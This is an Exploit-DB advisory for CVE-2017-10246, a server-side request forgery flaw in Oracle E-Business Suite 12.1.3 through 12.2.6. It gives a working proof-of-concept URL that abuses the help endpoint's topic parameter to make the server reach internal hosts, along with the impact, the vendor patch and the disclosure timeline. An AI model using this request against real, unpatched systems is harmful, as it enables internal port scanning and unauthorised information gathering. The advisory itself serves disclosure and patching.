Oracle E-Business Suite 12.x - Server-Side Request Forgery

EDB-ID:

42340




Platform:

JSP

Date:

2017-07-19


# Exploit Title: Oracle E-Business Suite - Server Side Request Forgery
# Date: 19 July 2017
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: Raj3sh.tv, Deepu.tv
# Vendor Homepage: www.oracle.com
# Software Link:
http://www.oracle.com/us/products/applications/ebusiness/overview/index.html
# Version: Oracle E-Business Suite 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6
# CVE: CVE-2017-10246

# PoC Exploit: Server Side Request Forgery
------------------------------------------
Vulnerable URL:
http://
<EBS_Application>/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://
<Internal_IP:Port>

# Description: The application is vulnerable to server side request forgery
attacks. We were able to use the web server to send packets internally and
thereby perform port scan on other internal assets and/or obtain
information accessible only from inside or otherwise not accessible to an
external user. It was also possible to query internal server information
otherwise unavailable publicly.
# Impact: A presumed attacker could use EBS server resources to conduct
internal information gathering or obtain information otherwise inaccessible
publicly.
# Solution: Apply the oracle EBS patch released on 18 July 2017

########################################
# Vulnerability Disclosure Timeline:

2017-April-29:  Discovered vulnerability
2017-April-30:  Vendor Notification
2017-May-01:  Vendor Response/Feedback
2017-July-18:  Vendor Fix/Patch
2017-July-19:  Public Disclosure
########################################